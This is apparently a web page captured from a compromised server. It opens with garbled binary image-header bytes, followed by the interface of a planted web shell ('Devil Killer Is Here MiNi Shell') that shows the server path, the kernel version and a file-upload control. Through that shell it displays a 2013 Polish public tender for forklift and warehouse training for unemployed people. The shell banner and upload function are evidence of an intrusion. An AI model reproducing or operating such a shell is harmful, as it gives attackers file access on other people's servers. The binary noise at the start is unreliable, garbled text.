JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130805/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130805/314570-N-2013.html

<p class="kh_header"><b>Nakło nad Notecią: Usługa szkoleniowa dla osób bezrobotnych, zarejestrowanych w PUP w Nakle nad Notecią i Filii w Szubinie, polegająca na zorganizowaniu i przeprowadzeniu szkolenia o nazwie Magazynier z obsługą wózków podnośnikowych</b><br>
<b>Numer ogłoszenia: 314570 - 2013; data zamieszczenia: 05.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Dąbrowskiego 46, 89-100 Nakło nad Notecią, woj. kujawsko-pomorskie, tel. 0-52 386 76 10, faks 0-52 386 76 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupnaklo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa szkoleniowa dla osób bezrobotnych, zarejestrowanych w PUP w Nakle nad Notecią i Filii w Szubinie, polegająca na zorganizowaniu i przeprowadzeniu szkolenia o nazwie Magazynier z obsługą wózków podnośnikowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia dla osób bezrobotnych Powiatu nakielskiego o nazwie Magazynier z obsługą wózka podnośnikowego.
2.	Cel szkolenia
Celem szkolenia jest przygotowanie uczestników do pracy na stanowisku magazyniera oraz uzyskanie uprawnień operatora wózka podnośnikowego.
3.	     Liczba uczestników
Szkolenie przeznaczone jest dla 15 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Nakle nad Notecią  i Filii w Szubinie finansowanych ze środków Europejskiego Funduszu Społecznego w ramach projektu Aktywność - Twój sposób na sukces w ramach PO KL Poddziałania 6.1.3.
Minimalna liczba uczestników - 14 osób 
4.	Czas trwania i sposób organizacji szkolenia
a.	Szkolenie musi być realizowane według planu nauczania obejmującego przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu.
b.	Łączny czas trwania zajęć  w ciągu jednego dnia nie może przekroczyć 8 godzin zegarowych. 
c.	Przez jedną godzinę należy rozumieć: 60 minut - 45 minut zajęć edukacyjnych oraz 15 minut przerwy, przy czym długość przerwy może być ustalona w sposób elastyczny. Zajęcia nie mogą kończyć się przerwą.
d.	Realizacja szkolenia odbywać będzie się w ciągu 5 dni tygodnia od poniedziałku do piątku. Zajęcia powinny  rozpoczynać się nie wcześniej niż o godz. 8.00, a kończyć nie później niż o godz. 17.00. Liczba godzin zajęć każdego dnia musi być pełna. 
e.	Organizacja zajęć - zajęcia teoretyczne muszą być przeprowadzone w jednej grupie, natomiast zajęcia praktyczne z obsługi wózków podnośnikowych muszą być prowadzone w grupach. Zamawiający żąda aby grupy były 3 osobowe, a zajęcia praktyczne odbywały się w następujący sposób:
     -  dwie grupy prowadzone równolegle w godzinach rannych i
- dwie kolejne grupy prowadzone równolegle w godzinach popołudniowych 
(maksymalne ilość osób przeszkolonych jednego dnia to 12).  
f.	Wykonawca zobowiązany jest do powołania komisji egzaminacyjne, która przeprowadzi egzamin dotyczący uzyskania uprawnień operatora wózka podnośnikowego.  
g.	O terminie egzaminu Wykonawca musi powiadomić pisemnie Zamawiającego najpóźniej 4 dni przed zakończeniem szkolenia. 
h.	Do zajęć teoretycznych Wykonawca musi zapewnić minimum                         1 wykładowcę posiadającego wiedzę teoretyczną dotyczącą każdego                     z bloków programowych obejmujących szkolenie.
i.	Do zajęć praktycznych z obsługi wózka Wykonawca musi posiadać co najmniej 2 sprawne wózki podnośnikowe i dwóch instruktorów posiadających kwalifikacje uprawniające do nauki. 
j.	Do zajęć z zakresu obsługi kas fiskalnych Wykonawca musi posiadać minimum 5 kas fiskalnych.
k.	Do zajęć z obsługi programów magazynowych oraz fakturowania Wykonawca musi zapewnić każdemu uczestnikowi dostęp do osobnego stanowiska komputerowego (komputer stacjonarny lub laptop). 
5.	Miejsce realizacji szkolenia
a.	Zajęcia dotyczące bloku programowego nr 1 i 2 muszą odbywać się w Nakle nad Notecią. Wykonawca zobowiązany jest w Wykazie pomieszczeń oraz sprzętu niezbędnego do realizacji przedmiotu zamówienia - Załącznik nr 7 do SIWZ wskazać dokładny adres miejsca odbywania zajęć. Musi przedstawić opis pomieszczeń oraz informacje o prawie do dysponowania pomieszczeniem, w którym odbywać się będą zajęcia. 
b.	Zajęcia praktyczne z obsługi wózka podnośnikowego ( dot. bloku programowego nr 1)  - Zamawiający dopuszcza możliwość przeprowadzenia ich poza Nakłem nad Notecią. W takim jednak przypadku Wykonawca zobowiązany jest zorganizować na własny koszt wspólny dojazd uczestnikom kursu w miejsce szkolenia. Podróż w jedną stronę nie może być dłuższa niż  1 godzina jazdy samochodem, lub busem, mierząc od siedziby Zamawiającego, która będzie punktem zbiorczym uczestników kursu do punktu odbywania zajęć. 
W celu zweryfikowania czasu dojazdu na trasie Zamawiający wykorzysta mapy dostępne w Internecie.
W przypadku przekroczenia tego czasu Wykonawca musi zapewnić kursantom zakwaterowanie i wyżywienie (śniadanie, obiad, kolacja) w miejscu zakwaterowania, a poniesione w tym celu koszty ująć w ogólny koszcie szkolenia.                     
c.	Sala do zajęć teoretycznych  w warunkach codziennego użytkowania powinna mieć przeznaczenie wykładowe lub konferencyjne powinna być wyposażona w tablicę, sprzęt audiowizualny, ułatwiający przekazywanie wiadomości uczestnikom szkolenia musi być wyposażona w odpowiednią, do liczby uczestników, liczbę stolików i miejsc siedzących, właściwie oświetlona, z odpowiednią temperaturą, przewietrzana. Wykonawca musi zapewnić uczestnikom szkolenia swobodny dostęp do pomieszczeń sanitarnych w budynku, w którym odbywa się szkolenie (tj. WC, umywalka wraz z dostępem do wody).
d.	Sala do zajęć teoretycznych oraz plac manewrowy muszą być oznakowane logo EFS.
6.	Materiały dydaktyczne i catering
a.	Każdy uczestnik szkolenia musi otrzymać w pierwszym dniu szkolenia materiały dydaktyczne z logo EFS przygotowane przez Wykonawcę w postaci długopisu, zeszytu, podręcznika lub skryptu zawierającego zakres tematyczny zawarty w programie szkolenia. Materiały dydaktyczne muszą uwzględniać zakres tematyczny dotyczący realizowanego szkolenia, po zakończeniu szkolenia przechodzą na własność uczestnika.
b.	Odbiór powyższych materiałów dydaktycznych potwierdzony zostanie przez każdego uczestnika podpisaniem stosownego oświadczenia.
c.	Wykonawca powinien zapewnić każdego dnia szkolenia catering                      w postaci: kawy, herbaty lub napojów zimnych w ilości min. 0,5 l na osobę. Wykonawca gwarantuje również podanie każdemu uczestnikowi szkolenia w każdym dniu 1 bułki z wędliną, serem lub warzywami (dotyczy czasu odbywania zajęć teoretycznych z zakresu bloków programu nr 1 i 2 oraz sytuacji, w której uczestnicy nie będą zakwaterowani na czas odbywania zajęć praktycznych z obsługi wózka podnośnikowego). 
7.	Zakres szkolenia
a.	Szkolenie powinno obejmować część teoretyczną i praktyczną z wykorzystaniem standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych w bazach danych prowadzonych przez Ministra Pracy i Polityki Społecznej z danego zakresu (www.standardyiszkolenia.praca.gov.pl),
b.	Szkolenie musi być zrealizowane zgodnie z właściwymi przepisami,                  w szczególności zgodnie z rozporządzeniem MPiPS z dnia 26 września 1997 r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (Dz.U. z 2003r. Nr 169, poz. 1650 z późn. zm.),
c.	Szkolenie musi być przeprowadzone zgodnie z programem szkolenia sporządzonym wg wzoru (załącznik nr 9 do SIWZ) oraz zapisami wskazanymi w niniejszych szczegółowych opisach przedmiotu zamówienia.
d.	Program szkolenia obejmuje 120 godzin zegarowych (bez egzaminu) Należy uwzględnić podział na zajęcia praktyczne i teoretyczne, przy czym zajęcia praktyczne z obsługi wózków podnośnikowych muszą wynieść min. 15 godz. 
W programie szkolenia należy uwzględnić następujące tematy,
1. BLOK TEMATYCZNY DOTYCZĄCY OPERATORA WÓZKA PODNOŚNIKOWEGO
- wiadomości z zakresu BHP,
- budowa wózka,
- czynności operatora przy obsłudze wózków przed podjęciem pracy, w czasie pracy z wózkami i po pracy z wózkami,
- wiadomości z zakresu ładunkoznawstwa,
- wiadomości o dozorze technicznym,
- bezpieczna obsługa i wymiana butli gazowych w wózkach,
- zajęcia praktyczne,
   2. BLOK TEMETYCZNY DOTYCZĄCY MAGAZYNIERA
- zasady prawidłowej gospodarki magazynowej 
- zakres obowiązków magazyniera 
- fakturowanie
- prowadzenie dokumentacji; obieg dokumentów i towarów
- przeprowadzanie inwentaryzacji
- zastosowanie programów do obsługi gospodarki magazynowej                     z wykorzystaniem komputera
- wykorzystanie kas fiskalnych w gospodarce magazynowej - zaznajomienie z obsługą 
e.	Osoba, której nieobecność na zajęciach przewyższać będzie 20% godzin przewidzianych programem szkolenia i nie uzupełni wiedzy, nie może uzyskać zaświadczenia o ukończeniu szkolenia i tym samym przystąpić do egzaminu.
f.	Wykonawca zobowiązany jest do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, którym nie przysługuje stypendium za okres odbywania szkolenia, oraz którym przysługuje stypendium za okres odbywania szkolenia, w trakcie którego podjęli zatrudnienie, inna pracę zarobkową 
lub działalność gospodarczą zgodnie z art. 41 ust. 3b oraz art. 41 ust 7 ustawy o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity: Dz.U.2013.674)
g.	Okres ubezpieczenia obejmie cały okres trwania szkolenia i należy go uwzględnić w całkowitym koszcie szkolenia.
h.	Przed podpisaniem umowy Wykonawca zobowiązany jest dostarczyć Zamawiającemu harmonogram szkolenia uwzględniający daty, ramy czasowe, zakres tematyczny oraz imię i nazwisko wykładowcy (termin rozpoczęcia kursu musi być ustalony wspólnie między Zamawiającym     a Wykonawcą). Należy pamiętać o podziale na grupy na zajęciach praktycznych !. 
8.	Zaświadczenia
     a. Po zakończeniu szkolenia uczestnicy muszą otrzymać zaświadczenie              o ukończeniu szkolenia zgodne z § 75 ust. 3 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r.  w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. nr 279 poz. 1641) zawierające:  
- numer z rejestru,
- imię i nazwisko oraz numer PESEL uczestnika szkolenia,                           a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość,
- nazwę instytucji szkoleniowej przeprowadzającej szkolenie,
- formę i nazwę szkolenia,      
- okres trwania szkolenia,
- miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, 
- tematy i wymiar godzin zajęć edukacyjnych,
- podpis osoby upoważnionej przez instytucję szkoleniowa przeprowadzającą szkolenie. 
   b.  Każdy uczestnik szkolenia, który zda egzamin przed komisja powołaną         przez Wykonawcę, otrzyma również dokument potwierdzający
        uzyskane kwalifikacje według jednego z następujących przepisów:
- Świadectwo kwalifikacyjne oraz wpis w książeczce-  operatora -  wydane na podstawie Rozporządzenia Ministra Gospodarki z dnia 20 września 2001 roku w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U.  nr 118, poz. 1263  z póź. zm.).
- Zaświadczenie kwalifikacyjne - wydane zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 18 lipca 2001 roku w sprawie trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych (Dz. U. nr 79, poz. 849 z póź. zm.)w nawiązaniu do art. 22 ust 3 i art. 23 ustawy o dozorze technicznym ( Dz. U. Nr 122,, poz. 1321 z póżn. zm.). 
   c.  Koszt egzaminu należy wliczyć do kosztów szkolenia w ilości jednego podejścia dla każdego uczestnika kursu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy posiadający wiedzę i doświadczenie z zakresu objętego zamówieniem. Wykonawca jest zobowiązany do przedłożenia wykazu wykonanych usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy to w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz, których usługi zostały wykonane, oraz z załączeniem dowodów czy zostały wykonane należycie. Zamawiający uzna, że warunek ten został spełniony, w sytuacji gdy Wykonawca wykaże w Wykazie wykonanych szkoleń grupowych o tej samej tematyce co przedmiot postępowania - stanowiącym załącznik nr 4 do SIWZ, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - to w tym okresie, zrealizował minimum 1 szkolenie grupowe (grupa - min 10 osób) o tej samej tematyce co przedmiot postępowania czyli Magazynier z obsługą wózka podnośnikowego. Wykonawca zobowiązany jest załączyć dowody potwierdzające, że usługi te zostały wykonane należycie. 
Dowodem potwierdzającym może być:
- poświadczenie, 
- oświadczenie Wykonawcy - jeśli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa wyżej.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa wyżej, zostały wcześniej wykonane, wykonawca nie ma obowiązku przekładania dowodów potwierdzających należyte ich wykonanie.
Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu wykonanych szkoleń grupowych i dowodów potwierdzających, że usługi zostały wykonane należycie; na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy dysponujący odpowiednim potencjałem technicznym do wykonywania zamówienia. Na potwierdzenie spełnienia tego warunku Wykonawca musi wykazać, w	Wykazie pomieszczeń oraz sprzętu niezbędnego do realizacji przedmiotu postępowania - zał. nr 7 do SIWZ, że dysponuje lub będzie dysponować podczas wykonywania zamówienia:
- pomieszczeniami umożliwiającymi realizację zajęć oraz odpowiednim placem do zajęć praktycznych z zakresu obsługi wózka podnośnikowego. Pomieszczenia oraz plac muszą być dostosowane do potrzeb szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków jego realizacji zgodnie z opisem pkt. 5 załącznika nr 1 do SIWZ.
- sprzętem do zajęć z zakresu obsługi kas fiskalnych - min. 5 kas fiskalnych, do zajęć z obsługi programów magazynowych oraz fakturowania - dla każdego uczestnika stanowisko komputerowe (komputer stacjonarny lub laptop) oraz do zajęć praktycznych -  min. 2 sprawne wózki podnośnikowe umożliwiając każdemu uczestnikowi prawidłową realizację zajęć oraz osiągnięcie celu szkolenia. 
Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu pomieszczeń oraz sprzętu na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy dysponujący osobami zdolnymi do wykonywania zamówienia. Na potwierdzenie spełnienia tego warunku Wykonawca musi wykazać, w	Wykazie osób, które będą uczestniczyć w wykonaniu przedmiotu postępowania - załącznik nr 5 do SIWZ osoby, posiadające odpowiednie kwalifikacje zawodowe, wykształcenie lub doświadczenie potrzebne do realizacji szkolenia będącego przedmiotem postępowania. Zamawiający wymaga, aby Wykonawca dysponował minimum 1 wykładowcą do zajęć teoretycznych w zakresie wszystkich bloków programowych obejmujących szkolenie oraz 2 instruktorów do zajęć praktycznych.
Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu osób uczestniczących w wykonaniu przedmiotu postępowania na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Program szkolenia zgodnie ze wzorem Zamawiającego (zał. nr 9 do SIWZ)</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a. Pełnomocnictwo, gdy Wykonawcę reprezentuje pełnomocnik lub osoba upoważniona. b. Certyfikaty jakości usług (o ile Wykonawca je posiada) wydane przez instytucje do tego uprawnione. c. Formularz ofertowy - zał. nr 2 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Posiadanie certyfikatu jakości usług ISO - 10</li>
<li>3 - Doświadczenie wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
